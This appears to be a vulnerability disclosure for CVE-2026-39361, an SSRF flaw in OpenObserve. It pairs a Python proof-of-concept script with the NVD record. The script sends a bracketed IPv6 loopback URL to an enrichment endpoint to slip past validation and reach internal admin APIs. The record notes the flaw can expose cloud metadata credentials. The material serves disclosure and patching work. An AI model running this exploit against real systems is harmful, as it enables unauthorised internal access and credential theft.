CVE-2026-39361

import requests # PoC for CVE-2026-39361: OpenObserve IPv6 Bypass # Target: OpenObserve <= 0.70.3 target_host = "http://localhost:5080" enrichment_endpoint = "/api/<enrichment_endpoint>" # Replace with actual endpoint auth_token = "<YOUR_AUTH_TOKEN>" # PR:L requires authentication # Malicious IPv6 payload with brackets to bypass validation # Example: Accessing localhost via IPv6 internal_ip = "[::1]" internal_path = "/api/admin/users" malicious_url = f"http://{internal_ip}{internal_path}" headers = { "Authorization": f"Bearer {auth_token}", "Content-Type": "application/json" } data = { "url": malicious_url } try: response = requests.post(f"{target_host}{enrichment_endpoint}", json=data, headers=headers, timeout=5) if response.status_code == 200: print("[+] Vulnerability confirmed! Internal service responded.") print(f"[+] Response: {response.text[:100]}") else: print(f"[-] Request failed with status: {response.status_code}") except Exception as e: print(f"[!] Error: {e}")

{"cve": {"id": "CVE-2026-39361", "sourceIdentifier": "[email protected]", "published": "2026-04-07T20:16:29.837", "lastModified": "2026-04-14T20:28:05.760", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenObserve is a cloud-native observability platform. In 0.70.3 and earlier, the validate_enrichment_url function in src/handler/http/request/enrichment_table/mod.rs fails to block IPv6 addresses because Rust's url crate returns them with surrounding brackets (e.g. \"[::1]\" not \"::1\"). An authenticated attacker can reach internal services blocked from external access. On cloud deployments this enables retrieval of IAM credentials via AWS IMDSv1 (169.254.169.254), GCP metadata, or Azure IMDS. On self-hosted deployments it allows probing internal network services."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openobserve:openobserve:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.70.3", "matchCriteriaId": "8F67F4AC-8D23-4A1F-B15B-B7F6C46961AF"}]}]}], "references": [{"url": "https://github.com/openobserve/openobserve/commit/d1a5d8f65b432e2e82f83231390dec7f107e8d75", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openobserve/openobserve/security/advisories/GHSA-gcwf-3p7h-wm79", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/openobserve/openobserve/security/advisories/GHSA-gcwf-3p7h-wm79", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}